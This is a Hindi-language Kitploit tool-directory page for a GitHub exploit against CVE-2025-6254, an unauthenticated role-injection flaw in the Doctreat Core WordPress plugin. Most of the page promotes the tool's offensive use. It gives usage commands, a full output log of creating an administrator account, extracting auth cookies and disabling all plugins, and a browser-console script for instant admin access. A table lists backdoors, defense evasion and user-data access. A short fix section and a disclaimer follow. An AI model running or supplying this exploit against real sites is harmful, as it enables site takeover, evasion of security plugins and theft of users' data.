Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6254 — CVE-2025-6254 — Doctreat Core <= 1.6.8 — अनधिकृत विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/yucaerin/cve-2025-6254
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षाCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
yucaerin/cve-2025-6254

CVE-2025-6254

CVE-2025-6254 — Doctreat Core <= 1.6.8 — अनधिकृत विशेषाधिकार वृद्धि

रिपॉजिटरी देखें

CVE-2025-6254 — Doctreat Core <= 1.6.8 — अप्रमाणित विशेषाधिकार वृद्धि (Unauthenticated Privilege Escalation) भूमिका इंजेक्शन (Role Injection) के माध्यम से

🔥 भेद्यता सारांश (Vulnerability Summary)

वर्डप्रेस प्लगइन Doctreat Core संस्करण <= 1.6.8 एक अप्रमाणित विशेषाधिकार वृद्धि भेद्यता से ग्रस्त है। यह गंभीर खामी अप्रमाणित हमलावरों को प्लगइन के रजिस्ट्रेशन AJAX एंडपॉइंट के माध्यम से सीधे एक नया प्रशासक (Administrator) खाता बनाने की अनुमति देती है।

यह भेद्यता hooks/hooks.php में doctreat_process_registration() फ़ंक्शन से उत्पन्न होती है, जो user_type पैरामीटर को सीधे उपयोगकर्ता द्वारा प्रस्तुत POST डेटा से स्वीकार करता है और इसे उचित प्राधिकरण या अनुमतिसूची सत्यापन के बिना wp_update_user() को role पैरामीटर के रूप में पास करता है। प्लगइन केवल esc_sql() लागू करता है (जो भूमिकाओं को मान्य नहीं करता) — यह कभी जाँच नहीं करता कि भूमिका सार्वजनिक पंजीकरण के लिए सुरक्षित है या नहीं।

ब्रेकथ्रू खोज: Doctreat द्वारा उपयोग किया गया नॉन्स (scripts_vars.ajax_nonce) सक्रिय Doctreat थीम के किसी भी सार्वजनिक पृष्ठ पर उजागर होता है। user_type पैरामीटर, जो सामान्यतः नियंत्रित करता है कि उपयोगकर्ता "doctors", "hospitals" या "regular_users" के रूप में पंजीकरण करता है, को POST के माध्यम से user_type=administrator द्वारा ओवरराइड किया जा सकता है — और यह मान WordPress के role पैरामीटर के रूप में सीधे पास हो जाता है।

🔍 प्रभावित प्लगइन

  • प्लगइन का नाम: Doctreat Core
  • प्रभावित संस्करण: <= 1.6.8
  • भेद्यता प्रकार: अप्रमाणित विशेषाधिकार वृद्धि (Unauthenticated Privilege Escalation) भूमिका इंजेक्शन (Role Injection) के माध्यम से
  • CVE ID: CVE-2025-6254
  • CVSS स्कोर: 9.8 (गंभीर)
  • CWE: CWE-269 — अनुचित विशेषाधिकार प्रबंधन (Improper Privilege Management)
  • प्रभाव: पूर्ण साइट अधिग्रहण (Full Site Takeover) — प्रशासक खाता निर्माण (Admin Account Creation)

🧨 हमलावर क्या कर सकते हैं

🧪 एक्सप्लॉइट की विशेषताएँ

  • 🔓 कोई प्रमाणीकरण आवश्यक नहीं
  • 📝 रजिस्ट्रेशन AJAX एंडपॉइंट के माध्यम से काम करता है
  • 🎯 AJAX एंडपॉइंट को लक्षित करता है /wp-admin/admin-ajax.php?action=doctreat_process_registration
  • 🧠 भूमिका इंजेक्शन (Role injection) — सामान्य रजिस्ट्रेशन फ़ील्ड के साथ user_type=administrator प्रस्तुत करता है
  • 🌐 स्वचालित नॉन्स निष्कर्षण — Doctreat थीम के सार्वजनिक पृष्ठों से ajax_nonce स्क्रैप करता है
  • 🔐 नॉन्स सत्यापन को बायपास करता है — थीम स्क्रिप्ट द्वारा उजागर किए गए वैध नॉन्स का उपयोग करता है
  • 🔗 http/https को ऑटो-डिटेक्ट करता है — प्रोटोकॉल निर्दिष्ट करने की आवश्यकता नहीं
  • 🔒 असुरक्षित SSL समर्थन — स्व-हस्ताक्षरित/अमान्य प्रमाणपत्रों के साथ काम करता है
  • 🎛️ सभी प्लगइन को ऑटो-निष्क्रिय करें — 3 विधियाँ: plugins.php बल्क एक्शन, REST API, admin-ajax.php
  • 🍪 कुकी निष्कर्षण — ब्राउज़र/curl उपयोग के लिए WordPress प्रमाणीकरण कुकीज़ आउटपुट करता है
  • 🧠 JavaScript कंसोल स्क्रिप्ट — तत्काल प्रशासक पहुँच के लिए ब्राउज़र DevTools में पेस्ट करें

🧠 असुरक्षित कोड (Vulnerable Code)

root@kitploit:~
// doctreat_core/hooks/hooks.php ~ line 296
wp_update_user( array(
    'ID' => esc_sql( $user_identity ),
    'role' => esc_sql( $user_type ),  // ← user_type from $_POST via extract($_POST)
    'user_status' => 0
) );
root@kitploit:~
// ~ line 311 — Sets _is_verified after registration
update_user_meta( $user_identity, '_is_verified', 'no' );

नोट: डिफ़ॉल्ट सत्यापन सेटिंग्स वाले लक्ष्यों पर ($verify_user खाली या 'remove'), उपयोगकर्ता स्वचालित रूप से सत्यापित हो जाता है और तत्काल प्रशासक पहुँच प्राप्त करता है। ईमेल सत्यापन या व्यवस्थापक अनुमोदन सक्षम वाले लक्ष्यों के लिए अतिरिक्त सत्यापन चरणों की आवश्यकता होगी।

🚀 उपयोग (Usage)

root@kitploit:~
python3 CVE-2025-6254_exploit.py target.com
python3 CVE-2025-6254_exploit.py https://target.com
python3 CVE-2025-6254_exploit.py http://target.com:8080

मौजूदा क्रेडेंशियल्स के साथ लॉगिन करें (कुकीज़ प्राप्त करें)

root@kitploit:~
python3 CVE-2025-6254_exploit.py target.com username password

पूर्ण आउटपुट उदाहरण

root@kitploit:~
============================================================
CVE-2025-6254 PoC - Doctreat Core Privilege Escalation
============================================================
[*] Target: https://target.com
[+] Found nonce from https://target.com/: abc123xyz
[*] Sending registration request...
[*] Username: hackeradmin1234
[*] Role: administrator

[+] EXPLOIT SUCCESSFUL!
[+] Username: hackeradmin1234
[+] Password: Password@1234!
[+] Email: [email protected]
[+] Role: ADMINISTRATOR

[*] Attempting to login and extract cookies...
[*] Trying Doctreat admin-ajax.php login...
[*] AJAX login status: 200
[*] AJAX login response: {"type":"success","loggedin":true,...}

[+] LOGIN SUCCESSFUL! AUTH COOKIES EXTRACTED!
[+] JAVASCRIPT CONSOLE SCRIPT (COPY & PASTE):
// Paste this in browser DevTools console for instant admin access

[*] PHASE 2: AUTO-DISABLE ALL PLUGINS (PYTHON)
[*] Fetching plugin list from: https://target.com/wp-admin/plugins.php
[+] Found nonce: def456uvw
[+] Found 15 active plugins
[*] Disabling all plugins via bulk action...
[+] ALL PLUGINS DISABLED SUCCESSFULLY!

JavaScript कंसोल स्क्रिप्ट

एक्सप्लॉइट चलाने के बाद, जनरेटेड JavaScript को कॉपी करें और अपने ब्राउज़र के DevTools Console (F12) में पेस्ट करें:

root@kitploit:~
(function() {
    'use strict';
    console.log('[*] Starting WordPress admin access...');
    // ... cookies set automatically ...
    window.location.href = 'https://target.com/wp-admin/';
})();

आवश्यकताएँ (Requirements)

  • Python 3.6+
  • requests लाइब्रेरी (pip install requests)
  • लक्ष्य में होना चाहिए:
    • Doctreat थीम सक्रिय (नॉन्स निष्कर्षण के लिए)
    • Doctreat Core प्लगइन <= 1.6.8 सक्रिय
    • उपयोगकर्ता पंजीकरण सक्षम

🛠 सुधार सुझाव (Fix Recommendations)

root@kitploit:~
// SECURE: Allowlist only safe roles for public registration
$allowed_roles = array('doctors', 'hospitals', 'regular_users', 'seller');
if (!in_array($user_type, $allowed_roles, true)) {
    $user_type = 'regular_users';  // ← Reject ALL dangerous roles
}
  • पंजीकरण के लिए सख्त भूमिका अनुमतिसूची लागू करें
  • विशेषाधिकार प्राप्त भूमिकाओं के लिए current_user_can('create_users') क्षमता जाँच जोड़ें
  • wp_update_user() में पास करने से पहले user_type को मान्य करें
  • सार्वजनिक पंजीकरण से भूमिका असाइनमेंट को पूरी तरह हटाने पर विचार करें

🧠 शोधकर्ता (Researcher)

  • क्रेडिट: Friderika Baranyai (Foxyyy)

📚 संदर्भ (References)

  • Wordfence सलाहकार

🔒 अस्वीकरण (Disclaimer)

यह जानकारी केवल शैक्षिक और अधिकृत प्रवेश परीक्षण उद्देश्यों के लिए प्रदान की गई है। कंप्यूटर सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है। किसी भी ऐसे लक्ष्य का परीक्षण करने से पहले हमेशा स्पष्ट लिखित अनुमति प्राप्त करें जो आपके स्वामित्व में नहीं है।

टूल डाउनलोड करें
क्षमताप्रभाव
🔑 बिना लॉगिन के प्रशासक खाता बनाएँपूर्ण साइट अधिग्रहण (Full Site Takeover)
🎛️ सभी सुरक्षा प्लगइन को ऑटो-निष्क्रिय करेंरक्षा चोरी (Defense Evasion)
💉 प्लगइन/थीम PHP फ़ाइलें संपादित करेंरिमोट कोड निष्पादन (Remote Code Execution)
🕳️ छिपे हुए बैकडोर स्थापित करेंस्थायी पहुँच (Persistent Access)
👥 सभी उपयोगकर्ता डेटा देखेंगोपनीयता उल्लंघन (Privacy Violation)